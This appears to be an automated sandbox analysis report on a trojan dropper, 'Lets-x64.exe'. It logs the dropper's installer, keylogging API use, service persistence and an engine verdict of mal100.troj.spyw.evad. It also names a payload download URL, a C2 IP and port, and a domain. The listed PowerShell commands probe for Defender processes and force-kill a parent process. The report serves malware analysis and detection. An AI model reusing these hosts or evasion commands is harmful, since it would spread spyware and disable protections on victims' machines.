                              Source: irsetup.exe, 00000002.00000002.4576101821.0000000006178000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ooddoo.top/h
                              Source: irsetup.exe, 00000002.00000003.2065368988.0000000005D87000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000002.4575166203.0000000002E80000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000002.4575772146.0000000004110000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://xiaoma.s3.ap-east-1.amazonaws.com/iusb3mon.exe
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                              Source: unknownHTTPS traffic detected: 104.21.81.224:443 -> 192.168.2.5:49720 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\ProgramData\Program\iusb3mon.exe | Code function: <BackSpace> 28_2_06242BF0
Source: C:\ProgramData\Program\iusb3mon.exe | Code function: <Enter> 28_2_06242BF0
Source: C:\ProgramData\Program\iusb3mon.exe | Code function: 28_2_06242BF0 CreateMutexA,WaitForSingleObject,Sleep,lstrlenA,GetKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,lstrlenA,lstrcatA,lstrcatA
Source: C:\ProgramData\Program\iusb3mon.exe | Code function: 28_2_0625ABEF GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA
Source: powershell.exe | Process created: 80
Source: conhost.exe | Process created: 64
Source: cmd.exe | Process created: 43

System Summary

Source: Process Memory Space: powershell.exe PID: 5996, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7960, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: _P18sPbB.exe.2.dr | Static PE information: section name:
Source: _P18sPbB.exe.2.dr | Static PE information: section name:
Source: _P18sPbB.exe.2.dr | Static PE information: section name:
Source: _P18sPbB.exe.2.dr | Static PE information: section name:
Source: _P18sPbB.exe.2.dr | Static PE information: section name:
Source: iusb3mon.exe.17.dr | Static PE information: section name:
Source: iusb3mon.exe.17.dr | Static PE information: section name:
Source: iusb3mon.exe.17.dr | Static PE information: section name:
Source: iusb3mon.exe.17.dr | Static PE information: section name:
Source: iusb3mon.exe.17.dr | Static PE information: section name:
Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe | Process Stats: CPU usage > 49%
Source: C:\ProgramData\Program\iusb3mon.exe | Code function: 28_2_06245792 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetCurrentProcess,OpenProcessToken,DuplicateTokenEx,LoadLibraryA,GetProcAddress,SetTokenInformation,CreateProcessAsUserA,CloseHandle,CloseHandle,CloseHandle,FreeLibrary
Source: C:\ProgramData\Program\iusb3mon.exe | Code function: 28_2_0624628E WinExec,WinExec,WinExec,WinExec,Sleep,ExitWindowsEx
Source: C:\ProgramData\Program\iusb3mon.exe | Code function: 28_2_062439EC ExitWindowsEx
Source: C:\Windows\System32\svchost.exe | File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: C:\Users\user\Desktop\Lets-x64.exe | Code function: 0_2_00007FF668851C88
Source: C:\Users\user\Desktop\Lets-x64.exe | Code function: 0_2_00007FF668853D40
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Code function: 2_2_0000000180026800
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Code function: 2_2_0000000180030014
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Code function: 2_2_0000000180027854
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Code function: 2_2_000000018003C0A0
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Code function: 2_2_00000001800218A4
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Code function: 2_2_00000001800228CC
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Code function: 2_2_00000001800308FC
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Code function: 2_2_00000001800310FC
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Code function: 2_2_0000000180033914
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Code function: 2_2_000000018002B938
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Code function: 2_2_000000018002F154
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Code function: 2_2_0000000180033220
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Code function: 2_2_0000000180024A60
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Code function: 2_2_0000000180027268
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Code function: 2_2_000000018003029C
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Code function: 2_2_000000018002A29C
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Code function: 2_2_0000000180023AF0
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Code function: 2_2_00000001800352F8
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Code function: 2_2_0000000180031328
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Code function: 2_2_000000018001F34C
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Code function: 2_2_000000018003E354
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Code function: 2_2_0000000180021B88
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Code function: 2_2_00000001800223CC
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Code function: 2_2_0000000180026BD4
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Code function: 2_2_0000000180022BE8
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Code function: 2_2_000000018001EBFC
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Code function: 2_2_0000000180020C38
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Code function: 2_2_0000000180034C50
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Code function: 2_2_000000018001E454
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Code function: 2_2_000000018002649C
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Code function: 2_2_00000001800214A8
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Code function: 2_2_000000018001F520
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Code function: 2_2_000000018001ED40
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Code function: 2_2_000000018003CD74
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Code function: 2_2_000000018002759C
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Code function: 2_2_0000000180008DC0
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Code function: 2_2_00000001800215C4
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Code function: 2_2_0000000180037DC8
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Code function: 2_2_00000001800205D8
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Code function: 2_2_000000018002A600
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Code function: 2_2_0000000180032638
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Code function: 2_2_0000000180028E38
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Code function: 2_2_0000000180035694
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Code function: 2_2_0000000180027EB0
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Code function: 2_2_000000018002D6C0
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Code function: 2_2_0000000180026EEC
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Code function: 2_2_000000018003D774
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Code function: 2_2_00000001800347B0
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Code function: 2_2_0000000180039FD4
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Code function: 2_2_000000018001FFE0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 12_2_00007FF8488B7506
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 12_2_00007FF8488B82B2
Source: C:\ProgramData\Program\iusb3mon.exe | Code function: 28_2_0624F69A
Source: C:\ProgramData\Program\iusb3mon.exe | Code function: 28_2_0624AEE0
Source: C:\ProgramData\Program\iusb3mon.exe | Code function: 28_2_06252A81
Source: C:\ProgramData\Program\iusb3mon.exe | Code function: 28_2_0625A03E
Source: C:\ProgramData\Program\iusb3mon.exe | Code function: 28_2_04D1B49F
Source: C:\ProgramData\Program\iusb3mon.exe | Code function: 28_2_04D1FC59
Source: C:\ProgramData\Program\iusb3mon.exe | Code function: 28_2_04D23040
Source: C:\ProgramData\Program\iusb3mon.exe | Code function: String function: 04D1A9DA appears 42 times
Source: C:\ProgramData\Program\iusb3mon.exe | Code function: String function: 04D1A403 appears 94 times
Source: C:\ProgramData\Program\iusb3mon.exe | Code function: String function: 06249E44 appears 95 times
Source: C:\ProgramData\Program\iusb3mon.exe | Code function: String function: 0624A41B appears 46 times
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Code function: String function: 00000001800120F0 appears 66 times
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Code function: String function: 0000000180002960 appears 55 times
Source: Lets-x64.exe | Static PE information: invalid certificate
Source: Lets-x64.exe | Binary or memory string: OriginalFilename vs Lets-x64.exe
Source: Lets-x64.exe, 00000000.00000003.2058103435.0000000002F21000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename360SkinMgr.exe, vs Lets-x64.exe
Source: Lets-x64.exe, 00000000.00000000.2057606418.00007FF66885F000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilename360SkinMgr.exe, vs Lets-x64.exe
Source: Lets-x64.exe, 00000000.00000003.2058315983.0000000003025000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename vs Lets-x64.exe
Source: Lets-x64.exe, 00000000.00000003.2058315983.0000000003025000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \StringFileInfo\%04x%04x\OriginalFilename vs Lets-x64.exe
Source: Lets-x64.exe, 00000000.00000003.2058315983.0000000003025000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SpecialBuildPrivateBuildOriginalFilenameLegalTrademarksLegalCopyrightProductNameInternalNameFileDescriptionCompanyNameProductVersionFileVersion\StringFileInfo\%04x%04x\SpecialBuild\StringFileInfo\%04x%04x\OriginalFilename\StringFileInfo\%04x%04x\Comments\StringFileInfo\%04x%04x\LegalTrademarks\StringFileInfo\%04x%04x\LegalCopyright\StringFileInfo\%04x%04x\ProductName\StringFileInfo\%04x%04x\InternalName\StringFileInfo\%04x%04x\FileDescription\StringFileInfo\%04x%04x\CompanyName" vs Lets-x64.exe
Source: Lets-x64.exe, 00000000.00000003.2058315983.0000000003025000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamesuf_rt.exeL vs Lets-x64.exe
Source: Process Memory Space: powershell.exe PID: 5996, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7960, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: _P18sPbB.exe.2.dr | Static PE information: Section: ZLIB complexity 0.9953575721153847
Source: _P18sPbB.exe.2.dr | Static PE information: Section: ZLIB complexity 0.9967713647959183
Source: iusb3mon.exe.17.dr | Static PE information: Section: ZLIB complexity 0.9953575721153847
Source: iusb3mon.exe.17.dr | Static PE information: Section: ZLIB complexity 0.9967713647959183
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@245/106@1/3
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Code function: 2_2_0000000180010AB0 GetLastError,FormatMessageA
Source: C:\Users\user\Desktop\Lets-x64.exe | Code function: 0_2_00007FF6688519B4 GetCurrentDirectoryA,GetTempPathA,lstrlenA,lstrcpyA,lstrlenA,lstrcatA,wsprintfA,wsprintfA,DeleteFileA,RemoveDirectoryA,GetFileAttributesA,CreateDirectoryA,lstrcpyA,SetCurrentDirectoryA,lstrcpyA,CreateDirectoryA,SetCurrentDirectoryA,lstrcpyA,lstrlenA,lstrcatA,lstrcpyA,lstrcpyA,lstrcatA,lstrcpyA,lstrcatA,GetDiskFreeSpaceA,lstrcpyA,SetCurrentDirectoryA
Source: C:\ProgramData\Program\iusb3mon.exe | Code function: 28_2_06246D6C GetModuleFileNameA,wsprintfA,OpenSCManagerA,CreateServiceA,LockServiceDatabase,ChangeServiceConfig2A,ChangeServiceConfig2A,UnlockServiceDatabase,GetLastError,OpenServiceA,StartServiceA,StartServiceA,RegOpenKeyA,lstrlenA,RegSetValueExA
Source: C:\ProgramData\Program\iusb3mon.exe | Code function: 28_2_06245CE6 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle
Source: C:\ProgramData\Program\iusb3mon.exe | Code function: 28_2_001D2170 Sleep,CoInitializeEx,CoCreateInstance,CoUninitialize,VariantInit,VariantInit,VariantInit,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,VariantClear,VariantInit,VariantInit,VariantInit,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,CoUninitialize,SysFreeString,CoUninitialize,CoUninitialize,SysFreeString,SysAllocString,VariantInit,VariantInit,VariantInit,SysFreeString,VariantClear,VariantClear,VariantClear,VariantClear,CoUninitialize,_com_issue_error,MessageBoxA
Source: C:\ProgramData\Program\iusb3mon.exe | Code function: 28_2_062467CC shellex,SetThreadExecutionState,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,WinExec,WinExec,WinExec,WinExec,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,WSAStartup,socket,GetCurrentThreadId,htons,inet_addr,connect,InternetOpenA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,GetModuleFileNameA,GetModuleFileNameA,CopyFileA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,Sleep,ExitProcess,StartServiceCtrlDispatcherA,Sleep,GetModuleFileNameA,CopyFileA,Sleep
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | File created: C:\Program Files\product1\
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | File created: C:\Users\Public\Documents\dtw_H3NyEy\
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3364:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1524:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2848:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7500:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3004:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7780:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3552:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7440:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1864:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4592:120:WilError_03
Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe | Mutant created: \Sessions\1\BaseNamedObjects\LJPXYXC
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5632:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6564:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7960:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7724:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3112:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7240:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5996:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:180:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7068:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6532:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8148:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4024:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4748:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2296:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7188:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2920:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7556:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7952:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7664:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8152:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5800:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4676:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7220:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7768:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8048:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2892:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8044:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3848:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7060:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7620:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2604:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3360:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5332:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7708:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5292:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7400:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7968:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6020:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8028:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6548:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4696:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6368:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7472:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2956:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8076:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5776:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6436:120:WilError_03
Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe | Mutant created: \Sessions\1\BaseNamedObjects\202.79.169.178:25445:
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8120:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5312:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2980:120:WilError_03
Source: C:\Users\user\Desktop\Lets-x64.exe | File created: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0
Source: Lets-x64.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select ParentProcessId from Win32_Process where ProcessId=320
Source: C:\Users\user\Desktop\Lets-x64.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\Lets-x64.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
Source: unknown | Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Source: Lets-x64.exe | ReversingLabs: Detection: 13%
Source: Lets-x64.exe | Virustotal: Detection: 13%
Source: iusb3mon.exe | String found in binary or memory: lable> <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable> <IdleSettings> <StopOnIdleEnd>true</StopOnIdl
Source: iusb3mon.exe | String found in binary or memory: es>false</StopIfGoingOnBatteries> <AllowHardTerminate>false</AllowHardTerminate> <StartWhenAvailable>false</StartWhenAva
                              Source: C:\Users\user\Desktop\Lets-x64.exeFile read: C:\Users\user\Desktop\Lets-x64.exeJump to behavior
                              Source: unknownProcess created: C:\Users\user\Desktop\Lets-x64.exe "C:\Users\user\Desktop\Lets-x64.exe"
                              Source: C:\Users\user\Desktop\Lets-x64.exeProcess created: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe "C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe" __IRAOFF:5664114 "__IRAFN:C:\Users\user\Desktop\Lets-x64.exe" "__IRCT:0" "__IRTSS:0" "__IRSID:S-1-5-21-2246122658-3693405117-2476756634-1003"
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"msmpeng.exe\"));
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"securityhealthsystray.exe\"));
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"mpcopyaccelerator.exe\"));
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $mypid=(Get-WmiObject -Query 'select ParentProcessId from Win32_Process where ProcessId=320').ParentProcessId;if($mypid){Stop-Process -Id $mypid -Force;}
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start "title" "C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe"
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe "C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe"
